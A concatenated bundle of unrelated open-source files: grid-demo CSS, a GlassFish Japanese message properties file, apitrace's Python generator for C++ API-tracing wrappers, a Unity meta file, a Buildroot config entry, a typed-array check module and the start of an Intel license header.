padding: 0;
}
.social li
{
float: left;
margin-right: 1em;
}
.logo
{
display: block;
padding: .5em 0;
}
.nav-main li a
{
display: block;
padding: .5em 1.5em;
border: 1.5px solid #15cab8;
border-radius: 60px;
}
.nav-main li a:hover
{
color: #111;
border: 1.5px solid #FF8A80;
}
/* Styles to help demonstrate the grid */
code,
pre
{
font-family: 'Source Code Pro', Consolas, Menlo, Monaco, monospace;
padding: 3px;
color: #333;
border-radius: 5px;
background: #E0F2F1;
}
pre
{
padding: 10px;
text-align: center;
}
.demo p
{
margin: 0;
}
.demo .column pre
{
margin: 0;
padding: 20px 0;
-webkit-transition: all .2s ease-in-out;
-moz-transition: all .2s ease-in-out;
transition: all .2s ease-in-out;
}
.demo .column pre:hover
{
background: #A7FFEB;
}
.grid,
.column
{
-webkit-transition: all .25s ease-in-out;
-moz-transition: all .25s ease-in-out;
transition: all .25s ease-in-out;
}
.demo .column .grid
{
overflow: hidden;
background: rgba(241,227,213,.5);
}
.demo .column .row:first-child
{
border-radius: 5px 5px 0 0;
}
.demo .column .row:last-child
{
border-radius: 0 0 5px 5px;
}
p code
{
display: inline-block;
margin-top: 5px;
}
| {
"pile_set_name": "Github"
} |
#
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER.
#
# Copyright (c) 2011-2013 Oracle and/or its affiliates. All rights reserved.
#
# The contents of this file are subject to the terms of either the GNU
# General Public License Version 2 only ("GPL") or the Common Development
# and Distribution License("CDDL") (collectively, the "License"). You
# may not use this file except in compliance with the License. You can
# obtain a copy of the License at
# https://glassfish.dev.java.net/public/CDDL+GPL_1_1.html
# or packager/legal/LICENSE.txt. See the License for the specific
# language governing permissions and limitations under the License.
#
# When distributing the software, include this License Header Notice in each
# file and include the License file at packager/legal/LICENSE.txt.
#
# GPL Classpath Exception:
# Oracle designates this particular file as subject to the "Classpath"
# exception as provided by Oracle in the GPL Version 2 section of the License
# file that accompanied this code.
#
# Modifications:
# If applicable, add the following below the License Header, with the fields
# enclosed by brackets [] replaced by your own identifying information:
# "Portions Copyright [year] [name of copyright owner]"
#
# Contributor(s):
# If you wish your version of this file to be governed by only the CDDL or
# only the GPL Version 2, indicate your decision by adding "[Contributor]
# elects to include this software in this distribution under the [CDDL or GPL
# Version 2] license." If you don't indicate a single choice of license, a
# recipient has the option to distribute your version of this file under
# either the CDDL, the GPL Version 2 or to extend the choice of license to
# its licensees as provided above. However, if you add GPL Version 2 code
# and therefore, elected the GPL Version 2 license, then the option applies
# only if the new code is made subject to such option by the copyright
# holder.
#
no_such_alias=\u3053\u306E\u30C9\u30E1\u30A4\u30F3\u306E\u30C7\u30D5\u30A9\u30EB\u30C8\u30FB\u30B9\u30C8\u30A2\u3067\u5B9A\u7FA9\u3055\u308C\u305F\u30C8\u30FC\u30AF\u30F3[{1}]\u306E\u30A8\u30A4\u30EA\u30A2\u30B9[{0}]\u304C\u3042\u308A\u307E\u305B\u3093\u3002"asadmin create-password-alias"\u306E\u3088\u3046\u306A\u7BA1\u7406\u30A4\u30F3\u30BF\u30D5\u30A7\u30FC\u30B9\u3092\u4F7F\u7528\u3057\u3066\u30A8\u30A4\u30EA\u30A2\u30B9\u3092\u5148\u306B\u4F5C\u6210\u3059\u308B\u5FC5\u8981\u304C\u3042\u308A\u307E\u3059\u3002
| {
"pile_set_name": "Github"
} |
##########################################################################
#
# Copyright 2008-2010 VMware, Inc.
# All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
##########################################################################
"""Common trace code generation."""
# Adjust path
import os.path
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
import specs.stdapi as stdapi
def getWrapperInterfaceName(interface):
return "Wrap" + interface.expr
debug = False
class ComplexValueSerializer(stdapi.OnceVisitor):
'''Type visitors which generates serialization functions for
complex types.
Simple types are serialized inline.
'''
def __init__(self, serializer):
stdapi.OnceVisitor.__init__(self)
self.serializer = serializer
def visitVoid(self, literal):
pass
def visitLiteral(self, literal):
pass
def visitString(self, string):
pass
def visitConst(self, const):
self.visit(const.type)
def visitStruct(self, struct):
print 'static const char * _struct%s_members[%u] = {' % (struct.tag, len(struct.members))
for type, name, in struct.members:
if name is None:
print ' "",'
else:
print ' "%s",' % (name,)
print '};'
print 'static const trace::StructSig _struct%s_sig = {' % (struct.tag,)
if struct.name is None:
structName = '""'
else:
structName = '"%s"' % struct.name
print ' %u, %s, %u, _struct%s_members' % (struct.id, structName, len(struct.members), struct.tag)
print '};'
print
def visitArray(self, array):
self.visit(array.type)
def visitAttribArray(self, array):
pass
def visitBlob(self, array):
pass
def visitEnum(self, enum):
print 'static const trace::EnumValue _enum%s_values[] = {' % (enum.tag)
for value in enum.values:
print ' {"%s", %s},' % (value, value)
print '};'
print
print 'static const trace::EnumSig _enum%s_sig = {' % (enum.tag)
print ' %u, %u, _enum%s_values' % (enum.id, len(enum.values), enum.tag)
print '};'
print
def visitBitmask(self, bitmask):
print 'static const trace::BitmaskFlag _bitmask%s_flags[] = {' % (bitmask.tag)
for value in bitmask.values:
print ' {"%s", %s},' % (value, value)
print '};'
print
print 'static const trace::BitmaskSig _bitmask%s_sig = {' % (bitmask.tag)
print ' %u, %u, _bitmask%s_flags' % (bitmask.id, len(bitmask.values), bitmask.tag)
print '};'
print
def visitPointer(self, pointer):
self.visit(pointer.type)
def visitIntPointer(self, pointer):
pass
def visitObjPointer(self, pointer):
self.visit(pointer.type)
def visitLinearPointer(self, pointer):
self.visit(pointer.type)
def visitHandle(self, handle):
self.visit(handle.type)
def visitReference(self, reference):
self.visit(reference.type)
def visitAlias(self, alias):
self.visit(alias.type)
def visitOpaque(self, opaque):
pass
def visitInterface(self, interface):
pass
def visitPolymorphic(self, polymorphic):
if not polymorphic.contextLess:
return
print 'static void _write__%s(int selector, %s const & value) {' % (polymorphic.tag, polymorphic.expr)
print ' switch (selector) {'
for cases, type in polymorphic.iterSwitch():
for case in cases:
print ' %s:' % case
self.serializer.visit(type, 'static_cast<%s>(value)' % (type,))
print ' break;'
print ' }'
print '}'
print
class ValueSerializer(stdapi.Visitor, stdapi.ExpanderMixin):
'''Visitor which generates code to serialize any type.
Simple types are serialized inline here, whereas the serialization of
complex types is dispatched to the serialization functions generated by
ComplexValueSerializer visitor above.
'''
def visitLiteral(self, literal, instance):
print ' trace::localWriter.write%s(%s);' % (literal.kind, instance)
def visitString(self, string, instance):
if not string.wide:
cast = 'const char *'
suffix = 'String'
else:
cast = 'const wchar_t *'
suffix = 'WString'
if cast != string.expr:
# reinterpret_cast is necessary for GLubyte * <=> char *
instance = 'reinterpret_cast<%s>(%s)' % (cast, instance)
if string.length is not None:
length = ', %s' % self.expand(string.length)
else:
length = ''
print ' trace::localWriter.write%s(%s%s);' % (suffix, instance, length)
def visitConst(self, const, instance):
self.visit(const.type, instance)
def visitStruct(self, struct, instance):
print ' trace::localWriter.beginStruct(&_struct%s_sig);' % (struct.tag,)
for member in struct.members:
self.visitMember(member, instance)
print ' trace::localWriter.endStruct();'
def visitArray(self, array, instance):
length = '_c' + array.type.tag
index = '_i' + array.type.tag
array_length = self.expand(array.length)
print ' if (%s) {' % instance
print ' size_t %s = %s > 0 ? %s : 0;' % (length, array_length, array_length)
print ' trace::localWriter.beginArray(%s);' % length
print ' for (size_t %s = 0; %s < %s; ++%s) {' % (index, index, length, index)
print ' trace::localWriter.beginElement();'
self.visitElement(index, array.type, '(%s)[%s]' % (instance, index))
print ' trace::localWriter.endElement();'
print ' }'
print ' trace::localWriter.endArray();'
print ' } else {'
print ' trace::localWriter.writeNull();'
print ' }'
def visitAttribArray(self, array, instance):
# For each element, decide if it is a key or a value (which depends on the previous key).
# If it is a value, store it as the right type - usually int, some bitfield, or some enum.
# It is currently assumed that an unknown key means that it is followed by an int value.
# determine the array length which must be passed to writeArray() up front
count = '_c' + array.baseType.tag
print ' {'
print ' int %s;' % count
print ' for (%(c)s = 0; %(array)s && %(array)s[%(c)s] != %(terminator)s; %(c)s += 2) {' \
% {'c': count, 'array': instance, 'terminator': array.terminator}
if array.hasKeysWithoutValues:
print ' switch (int(%(array)s[%(c)s])) {' % {'array': instance, 'c': count}
for key, valueType in array.valueTypes:
if valueType is None:
print ' case %s:' % key
print ' %s--;' % count # the next value is a key again and checked if it's the terminator
print ' break;'
print ' }'
print ' }'
print ' %(c)s += %(array)s ? 1 : 0;' % {'c': count, 'array': instance}
print ' trace::localWriter.beginArray(%s);' % count
# for each key / key-value pair write the key and the value, if the key requires one
index = '_i' + array.baseType.tag
print ' for (int %(i)s = 0; %(i)s < %(count)s; %(i)s++) {' % {'i': index, 'count': count}
print ' trace::localWriter.beginElement();'
self.visit(array.baseType, "%(array)s[%(i)s]" % {'array': instance, 'i': index})
print ' trace::localWriter.endElement();'
print ' if (%(i)s + 1 >= %(count)s) {' % {'i': index, 'count': count}
print ' break;'
print ' }'
print ' switch (int(%(array)s[%(i)s++])) {' % {'array': instance, 'i': index}
# write generic value the usual way
for key, valueType in array.valueTypes:
if valueType is not None:
print ' case %s:' % key
print ' trace::localWriter.beginElement();'
self.visitElement(index, valueType, '(%(array)s)[%(i)s]' % {'array': instance, 'i': index})
print ' trace::localWriter.endElement();'
print ' break;'
# known key with no value, just decrease the index so we treat the next value as a key
if array.hasKeysWithoutValues:
for key, valueType in array.valueTypes:
if valueType is None:
print ' case %s:' % key
print ' %s--;' % index
print ' break;'
# unknown key, write an int value
print ' default:'
print ' trace::localWriter.beginElement();'
print ' os::log("apitrace: warning: %s: unknown key 0x%04X, interpreting value as int\\n", ' + \
'__FUNCTION__, int(%(array)s[%(i)s - 1]));' % {'array': instance, 'i': index}
print ' trace::localWriter.writeSInt(%(array)s[%(i)s]);' % {'array': instance, 'i': index}
print ' trace::localWriter.endElement();'
print ' break;'
print ' }'
print ' }'
print ' trace::localWriter.endArray();'
print ' }'
def visitBlob(self, blob, instance):
print ' trace::localWriter.writeBlob(%s, %s);' % (instance, self.expand(blob.size))
def visitEnum(self, enum, instance):
print ' trace::localWriter.writeEnum(&_enum%s_sig, %s);' % (enum.tag, instance)
def visitBitmask(self, bitmask, instance):
print ' trace::localWriter.writeBitmask(&_bitmask%s_sig, %s);' % (bitmask.tag, instance)
def visitPointer(self, pointer, instance):
print ' if (%s) {' % instance
print ' trace::localWriter.beginArray(1);'
print ' trace::localWriter.beginElement();'
self.visit(pointer.type, "*" + instance)
print ' trace::localWriter.endElement();'
print ' trace::localWriter.endArray();'
print ' } else {'
print ' trace::localWriter.writeNull();'
print ' }'
def visitIntPointer(self, pointer, instance):
print ' trace::localWriter.writePointer((uintptr_t)%s);' % instance
def visitObjPointer(self, pointer, instance):
print ' trace::localWriter.writePointer((uintptr_t)%s);' % instance
def visitLinearPointer(self, pointer, instance):
print ' trace::localWriter.writePointer((uintptr_t)%s);' % instance
def visitReference(self, reference, instance):
self.visit(reference.type, instance)
def visitHandle(self, handle, instance):
self.visit(handle.type, instance)
def visitAlias(self, alias, instance):
self.visit(alias.type, instance)
def visitOpaque(self, opaque, instance):
print ' trace::localWriter.writePointer((uintptr_t)%s);' % instance
def visitInterface(self, interface, instance):
assert False
def visitPolymorphic(self, polymorphic, instance):
if polymorphic.contextLess:
print ' _write__%s(%s, %s);' % (polymorphic.tag, polymorphic.switchExpr, instance)
else:
switchExpr = self.expand(polymorphic.switchExpr)
print ' switch (%s) {' % switchExpr
for cases, type in polymorphic.iterSwitch():
for case in cases:
print ' %s:' % case
caseInstance = instance
if type.expr is not None:
caseInstance = 'static_cast<%s>(%s)' % (type, caseInstance)
self.visit(type, caseInstance)
print ' break;'
if polymorphic.defaultType is None:
print r' default:'
print r' os::log("apitrace: warning: %%s: unexpected polymorphic case %%i\n", __FUNCTION__, (int)%s);' % (switchExpr,)
print r' trace::localWriter.writeNull();'
print r' break;'
print ' }'
class WrapDecider(stdapi.Traverser):
    '''Type visitor which will decide whether this type will need wrapping or not.
    For complex types (arrays, structures), we need to know this beforehand.
'''
def __init__(self):
self.needsWrapping = False
def visitLinearPointer(self, void):
pass
def visitInterface(self, interface):
self.needsWrapping = True
class ValueWrapper(stdapi.Traverser, stdapi.ExpanderMixin):
'''Type visitor which will generate the code to wrap an instance.
Wrapping is necessary mostly for interfaces, however interface pointers can
appear anywhere inside complex types.
'''
def visitStruct(self, struct, instance):
for member in struct.members:
self.visitMember(member, instance)
def visitArray(self, array, instance):
array_length = self.expand(array.length)
print " if (%s) {" % instance
print " for (size_t _i = 0, _s = %s; _i < _s; ++_i) {" % array_length
self.visitElement('_i', array.type, instance + "[_i]")
print " }"
print " }"
def visitPointer(self, pointer, instance):
print " if (%s) {" % instance
self.visit(pointer.type, "*" + instance)
print " }"
def visitObjPointer(self, pointer, instance):
elem_type = pointer.type.mutable()
if isinstance(elem_type, stdapi.Interface):
self.visitInterfacePointer(elem_type, instance)
elif isinstance(elem_type, stdapi.Alias) and isinstance(elem_type.type, stdapi.Interface):
self.visitInterfacePointer(elem_type.type, instance)
else:
self.visitPointer(pointer, instance)
def visitInterface(self, interface, instance):
raise NotImplementedError
def visitInterfacePointer(self, interface, instance):
print " if (%s) {" % instance
print " %s = %s::_Create(__FUNCTION__, %s);" % (instance, getWrapperInterfaceName(interface), instance)
print " }"
def visitPolymorphic(self, type, instance):
# XXX: There might be polymorphic values that need wrapping in the future
raise NotImplementedError
class ValueUnwrapper(ValueWrapper):
'''Reverse of ValueWrapper.'''
allocated = False
def visitStruct(self, struct, instance):
if not self.allocated:
            # Argument is constant. We need to create a non-const copy.
print ' {'
print " %s * _t = static_cast<%s *>(alloca(sizeof *_t));" % (struct, struct)
print ' *_t = %s;' % (instance,)
assert instance.startswith('*')
print ' %s = _t;' % (instance[1:],)
instance = '*_t'
self.allocated = True
try:
return ValueWrapper.visitStruct(self, struct, instance)
finally:
print ' }'
else:
return ValueWrapper.visitStruct(self, struct, instance)
def visitArray(self, array, instance):
if self.allocated or isinstance(instance, stdapi.Interface):
return ValueWrapper.visitArray(self, array, instance)
array_length = self.expand(array.length)
elem_type = array.type.mutable()
print " if (%s && %s) {" % (instance, array_length)
print " %s * _t = static_cast<%s *>(alloca(%s * sizeof *_t));" % (elem_type, elem_type, array_length)
print " for (size_t _i = 0, _s = %s; _i < _s; ++_i) {" % array_length
print " _t[_i] = %s[_i];" % instance
self.allocated = True
self.visit(array.type, "_t[_i]")
print " }"
print " %s = _t;" % instance
print " }"
def visitInterfacePointer(self, interface, instance):
print r' if (%s) {' % instance
print r' const %s *pWrapper = static_cast<const %s*>(%s);' % (getWrapperInterfaceName(interface), getWrapperInterfaceName(interface), instance)
print r' if (pWrapper && pWrapper->m_dwMagic == 0xd8365d6c) {'
print r' %s = pWrapper->m_pInstance;' % (instance,)
print r' } else {'
print r' os::log("apitrace: warning: %%s: unexpected %%s pointer\n", __FUNCTION__, "%s");' % interface.name
print r' }'
print r' }'
class Tracer:
'''Base class to orchestrate the code generation of API tracing.'''
# 0-3 are reserved to memcpy, malloc, free, and realloc
__id = 4
def __init__(self):
self.api = None
def serializerFactory(self):
'''Create a serializer.
        Can be overridden by derived classes to inject their own serializer.
'''
return ValueSerializer()
def traceApi(self, api):
self.api = api
self.header(api)
# Includes
for module in api.modules:
for header in module.headers:
print header
print
# Generate the serializer functions
visitor = ComplexValueSerializer(self.serializerFactory())
for module in api.modules:
self.traceTypeDeclBegin( module )
types = module.getAllTypes()
map(visitor.visit, types)
self.traceTypeDeclEnd( module )
print
# Interfaces wrapers
self.traceInterfaces(api)
# Function wrappers
self.interface = None
self.base = None
for module in api.modules:
self.traceFunctionDeclBegin( module )
for function in module.getAllFunctions():
self.traceFunctionDecl(function)
self.traceFunctionDeclEnd( module )
print
for module in api.modules:
self.traceFunctionImplBegin( module )
for function in module.getAllFunctions():
self.traceFunctionImpl(function)
self.traceFunctionImplEnd( module );
print
self.footer(api)
def header(self, api):
print '#ifdef _WIN32'
print '# include <malloc.h> // alloca'
print '# ifndef alloca'
print '# define alloca _alloca'
print '# endif'
print '#else'
print '# include <alloca.h> // alloca'
print '#endif'
print
print
print 'static std::map<void *, void *> g_WrappedObjects;'
def footer(self, api):
pass
def traceModuleGuardBegin(self, module):
pass
def traceModuleGuardEnd(self, module):
pass
def traceFunctionImplBegin(self, module):
self.traceModuleGuardBegin( module )
def traceFunctionImplEnd(self, module):
self.traceModuleGuardEnd( module )
def traceFunctionDeclBegin(self, module):
self.traceModuleGuardBegin( module )
def traceFunctionDeclEnd(self, module):
self.traceModuleGuardEnd( module )
def traceTypeDeclBegin(self, module):
self.traceModuleGuardBegin( module )
def traceTypeDeclEnd(self, module):
self.traceModuleGuardEnd( module )
def traceFunctionDecl(self, function):
# Per-function declarations
if not function.internal:
if function.args:
print 'static const char * _%s_args[%u] = {%s};' % (function.name, len(function.args), ', '.join(['"%s"' % arg.name for arg in function.args]))
else:
print 'static const char ** _%s_args = NULL;' % (function.name,)
print 'static const trace::FunctionSig _%s_sig = {%u, "%s", %u, _%s_args};' % (function.name, self.getFunctionSigId(), function.name, len(function.args), function.name)
print
def getFunctionSigId(self):
id = Tracer.__id
Tracer.__id += 1
return id
def isFunctionPublic(self, function):
return True
def traceFunctionImpl(self, function):
if self.isFunctionPublic(function):
print 'extern "C" PUBLIC'
else:
print 'extern "C" PRIVATE'
print function.prototype() + ' {'
if function.type is not stdapi.Void:
print ' %s _result;' % function.type
self.traceFunctionImplBody(function)
if function.type is not stdapi.Void:
print ' return _result;'
print '}'
print
def traceFunctionImplBody(self, function):
if not function.internal:
print ' unsigned _call = trace::localWriter.beginEnter(&_%s_sig);' % (function.name,)
for arg in function.args:
if not arg.output:
self.unwrapArg(function, arg)
for arg in function.args:
if not arg.output:
self.serializeArg(function, arg)
print ' trace::localWriter.endEnter();'
self.invokeFunction(function)
if not function.internal:
print ' trace::localWriter.beginLeave(_call);'
print ' if (%s) {' % self.wasFunctionSuccessful(function)
for arg in function.args:
if arg.output:
self.serializeArg(function, arg)
self.wrapArg(function, arg)
print ' }'
if function.type is not stdapi.Void:
self.serializeRet(function, "_result")
if function.type is not stdapi.Void:
self.wrapRet(function, "_result")
print ' trace::localWriter.endLeave();'
def invokeFunction(self, function):
self.doInvokeFunction(function)
def doInvokeFunction(self, function, prefix='_', suffix=''):
        # Same as invokeFunction(), but called regardless of whether tracing is enabled or disabled.
if function.type is stdapi.Void:
result = ''
else:
result = '_result = '
dispatch = prefix + function.name + suffix
print ' %s%s(%s);' % (result, dispatch, ', '.join([str(arg.name) for arg in function.args]))
def wasFunctionSuccessful(self, function):
if function.type is stdapi.Void:
return 'true'
if str(function.type) == 'HRESULT':
return 'SUCCEEDED(_result)'
return 'true'
def serializeArg(self, function, arg):
print ' trace::localWriter.beginArg(%u);' % (arg.index,)
self.serializeArgValue(function, arg)
print ' trace::localWriter.endArg();'
def serializeArgValue(self, function, arg):
self.serializeValue(arg.type, arg.name)
def wrapArg(self, function, arg):
assert not isinstance(arg.type, stdapi.ObjPointer)
from specs.winapi import REFIID
riid = None
for other_arg in function.args:
if not other_arg.output and other_arg.type is REFIID:
riid = other_arg
if riid is not None \
and isinstance(arg.type, stdapi.Pointer) \
and isinstance(arg.type.type, stdapi.ObjPointer):
self.wrapIid(function, riid, arg)
return
self.wrapValue(arg.type, arg.name)
def unwrapArg(self, function, arg):
self.unwrapValue(arg.type, arg.name)
def serializeRet(self, function, instance):
print ' trace::localWriter.beginReturn();'
self.serializeValue(function.type, instance)
print ' trace::localWriter.endReturn();'
def serializeValue(self, type, instance):
serializer = self.serializerFactory()
serializer.visit(type, instance)
def wrapRet(self, function, instance):
self.wrapValue(function.type, instance)
def needsWrapping(self, type):
visitor = WrapDecider()
visitor.visit(type)
return visitor.needsWrapping
def wrapValue(self, type, instance):
if self.needsWrapping(type):
visitor = ValueWrapper()
visitor.visit(type, instance)
def unwrapValue(self, type, instance):
if self.needsWrapping(type):
visitor = ValueUnwrapper()
visitor.visit(type, instance)
def traceInterfaces(self, api):
interfaces = api.getAllInterfaces()
if not interfaces:
return
map(self.declareWrapperInterface, interfaces)
self.implementIidWrapper(api)
map(self.implementWrapperInterface, interfaces)
print
def declareWrapperInterface(self, interface):
print "class %s : public %s " % (getWrapperInterfaceName(interface), interface.name)
print "{"
print "private:"
print " %s(%s * pInstance);" % (getWrapperInterfaceName(interface), interface.name)
print " virtual ~%s();" % getWrapperInterfaceName(interface)
print "public:"
print " static %s* _Create(const char *functionName, %s * pInstance);" % (getWrapperInterfaceName(interface), interface.name)
print
for method in interface.iterMethods():
print " " + method.prototype() + ";"
print
for type, name, value in self.enumWrapperInterfaceVariables(interface):
print ' %s %s;' % (type, name)
for i in range(64):
print r' virtual void _dummy%i(void) const {' % i
print r' os::log("error: %s: unexpected virtual method\n");' % interface.name
print r' os::abort();'
print r' }'
print "};"
print
def enumWrapperInterfaceVariables(self, interface):
return [
("DWORD", "m_dwMagic", "0xd8365d6c"),
("%s *" % interface.name, "m_pInstance", "pInstance"),
("void *", "m_pVtbl", "*(void **)pInstance"),
("UINT", "m_NumMethods", len(list(interface.iterBaseMethods()))),
]
def implementWrapperInterface(self, interface):
self.interface = interface
# Private constructor
print '%s::%s(%s * pInstance) {' % (getWrapperInterfaceName(interface), getWrapperInterfaceName(interface), interface.name)
for type, name, value in self.enumWrapperInterfaceVariables(interface):
if value is not None:
print ' %s = %s;' % (name, value)
print '}'
print
# Public constructor
print '%s *%s::_Create(const char *functionName, %s * pInstance) {' % (getWrapperInterfaceName(interface), getWrapperInterfaceName(interface), interface.name)
print r' std::map<void *, void *>::const_iterator it = g_WrappedObjects.find(pInstance);'
print r' if (it != g_WrappedObjects.end()) {'
print r' Wrap%s *pWrapper = (Wrap%s *)it->second;' % (interface.name, interface.name)
print r' assert(pWrapper);'
print r' assert(pWrapper->m_dwMagic == 0xd8365d6c);'
print r' assert(pWrapper->m_pInstance == pInstance);'
print r' if (pWrapper->m_pVtbl == *(void **)pInstance &&'
print r' pWrapper->m_NumMethods >= %s) {' % len(list(interface.iterBaseMethods()))
if debug:
print r' os::log("%s: fetched pvObj=%p pWrapper=%p pVtbl=%p\n", functionName, pInstance, pWrapper, pWrapper->m_pVtbl);'
print r' return pWrapper;'
print r' }'
print r' }'
print r' Wrap%s *pWrapper = new Wrap%s(pInstance);' % (interface.name, interface.name)
if debug:
print r' os::log("%%s: created %s pvObj=%%p pWrapper=%%p pVtbl=%%p\n", functionName, pInstance, pWrapper, pWrapper->m_pVtbl);' % interface.name
print r' g_WrappedObjects[pInstance] = pWrapper;'
print r' return pWrapper;'
print '}'
print
# Destructor
print '%s::~%s() {' % (getWrapperInterfaceName(interface), getWrapperInterfaceName(interface))
if debug:
print r' os::log("%s::Release: deleted pvObj=%%p pWrapper=%%p pVtbl=%%p\n", m_pInstance, this, m_pVtbl);' % interface.name
print r' g_WrappedObjects.erase(m_pInstance);'
print '}'
print
for base, method in interface.iterBaseMethods():
self.base = base
self.implementWrapperInterfaceMethod(interface, base, method)
print
def implementWrapperInterfaceMethod(self, interface, base, method):
print method.prototype(getWrapperInterfaceName(interface) + '::' + method.name) + ' {'
if False:
print r' os::log("%%s(%%p -> %%p)\n", "%s", this, m_pInstance);' % (getWrapperInterfaceName(interface) + '::' + method.name)
if method.type is not stdapi.Void:
print ' %s _result;' % method.type
self.implementWrapperInterfaceMethodBody(interface, base, method)
if method.type is not stdapi.Void:
print ' return _result;'
print '}'
print
def implementWrapperInterfaceMethodBody(self, interface, base, method):
assert not method.internal
print ' static const char * _args[%u] = {%s};' % (len(method.args) + 1, ', '.join(['"this"'] + ['"%s"' % arg.name for arg in method.args]))
print ' static const trace::FunctionSig _sig = {%u, "%s", %u, _args};' % (self.getFunctionSigId(), interface.name + '::' + method.name, len(method.args) + 1)
print ' %s *_this = static_cast<%s *>(m_pInstance);' % (base, base)
print ' unsigned _call = trace::localWriter.beginEnter(&_sig);'
print ' trace::localWriter.beginArg(0);'
print ' trace::localWriter.writePointer((uintptr_t)m_pInstance);'
print ' trace::localWriter.endArg();'
for arg in method.args:
if not arg.output:
self.unwrapArg(method, arg)
for arg in method.args:
if not arg.output:
self.serializeArg(method, arg)
print ' trace::localWriter.endEnter();'
self.invokeMethod(interface, base, method)
print ' trace::localWriter.beginLeave(_call);'
print ' if (%s) {' % self.wasFunctionSuccessful(method)
for arg in method.args:
if arg.output:
self.serializeArg(method, arg)
self.wrapArg(method, arg)
print ' }'
if method.type is not stdapi.Void:
self.serializeRet(method, '_result')
if method.type is not stdapi.Void:
self.wrapRet(method, '_result')
if method.name == 'Release':
assert method.type is not stdapi.Void
print r' if (!_result) {'
print r' delete this;'
print r' }'
print ' trace::localWriter.endLeave();'
def implementIidWrapper(self, api):
print r'static void'
print r'warnIID(const char *functionName, REFIID riid, const char *reason) {'
print r' os::log("apitrace: warning: %s: %s IID {0x%08lX,0x%04X,0x%04X,{0x%02X,0x%02X,0x%02X,0x%02X,0x%02X,0x%02X,0x%02X,0x%02X}}\n",'
print r' functionName, reason,'
print r' riid.Data1, riid.Data2, riid.Data3,'
print r' riid.Data4[0], riid.Data4[1], riid.Data4[2], riid.Data4[3], riid.Data4[4], riid.Data4[5], riid.Data4[6], riid.Data4[7]);'
print r'}'
print
print r'static void'
print r'wrapIID(const char *functionName, REFIID riid, void * * ppvObj) {'
print r' if (!ppvObj || !*ppvObj) {'
print r' return;'
print r' }'
else_ = ''
for iface in api.getAllInterfaces():
print r' %sif (riid == IID_%s) {' % (else_, iface.name)
print r' *ppvObj = Wrap%s::_Create(functionName, (%s *) *ppvObj);' % (iface.name, iface.name)
print r' }'
else_ = 'else '
print r' %s{' % else_
print r' warnIID(functionName, riid, "unknown");'
print r' }'
print r'}'
print
def wrapIid(self, function, riid, out):
# Cast output arg to `void **` if necessary
out_name = out.name
obj_type = out.type.type.type
if not obj_type is stdapi.Void:
assert isinstance(obj_type, stdapi.Interface)
out_name = 'reinterpret_cast<void * *>(%s)' % out_name
print r' if (%s && *%s) {' % (out.name, out.name)
functionName = function.name
else_ = ''
if self.interface is not None:
functionName = self.interface.name + '::' + functionName
print r' if (*%s == m_pInstance &&' % (out_name,)
print r' (%s)) {' % ' || '.join('%s == IID_%s' % (riid.name, iface.name) for iface in self.interface.iterBases())
print r' *%s = this;' % (out_name,)
print r' }'
else_ = 'else '
print r' %s{' % else_
print r' wrapIID("%s", %s, %s);' % (functionName, riid.name, out_name)
print r' }'
print r' }'
def invokeMethod(self, interface, base, method):
if method.type is stdapi.Void:
result = ''
else:
result = '_result = '
print ' %s_this->%s(%s);' % (result, method.name, ', '.join([str(arg.name) for arg in method.args]))
def emit_memcpy(self, ptr, size):
print ' trace::fakeMemcpy(%s, %s);' % (ptr, size)
def fake_call(self, function, args):
print ' unsigned _fake_call = trace::localWriter.beginEnter(&_%s_sig, true);' % (function.name,)
for arg, instance in zip(function.args, args):
assert not arg.output
print ' trace::localWriter.beginArg(%u);' % (arg.index,)
self.serializeValue(arg.type, instance)
print ' trace::localWriter.endArg();'
print ' trace::localWriter.endEnter();'
print ' trace::localWriter.beginLeave(_fake_call);'
print ' trace::localWriter.endLeave();'
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: 1d9548d9a173a40e4b758ecf6e4fed49
timeCreated: 1457326885
licenseType: Store
MonoImporter:
serializedVersion: 2
defaultReferences: []
executionOrder: 0
icon: {instanceID: 0}
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
config BR2_PACKAGE_PYTHON_TWISTED
bool "python-twisted"
depends on BR2_PACKAGE_PYTHON
select BR2_PACKAGE_PYTHON_ZOPE_INTERFACE # runtime
help
Twisted is an event-driven networking engine written in Python.
https://twistedmatrix.com/trac/
| {
"pile_set_name": "Github"
} |
module.exports = isTypedArray
isTypedArray.strict = isStrictTypedArray
isTypedArray.loose = isLooseTypedArray
var toString = Object.prototype.toString
var names = {
'[object Int8Array]': true
, '[object Int16Array]': true
, '[object Int32Array]': true
, '[object Uint8Array]': true
, '[object Uint8ClampedArray]': true
, '[object Uint16Array]': true
, '[object Uint32Array]': true
, '[object Float32Array]': true
, '[object Float64Array]': true
}
function isTypedArray(arr) {
return (
isStrictTypedArray(arr)
|| isLooseTypedArray(arr)
)
}
function isStrictTypedArray(arr) {
return (
arr instanceof Int8Array
|| arr instanceof Int16Array
|| arr instanceof Int32Array
|| arr instanceof Uint8Array
|| arr instanceof Uint8ClampedArray
|| arr instanceof Uint16Array
|| arr instanceof Uint32Array
|| arr instanceof Float32Array
|| arr instanceof Float64Array
)
}
function isLooseTypedArray(arr) {
return names[toString.call(arr)]
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright © 2016 Intel Corporation
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
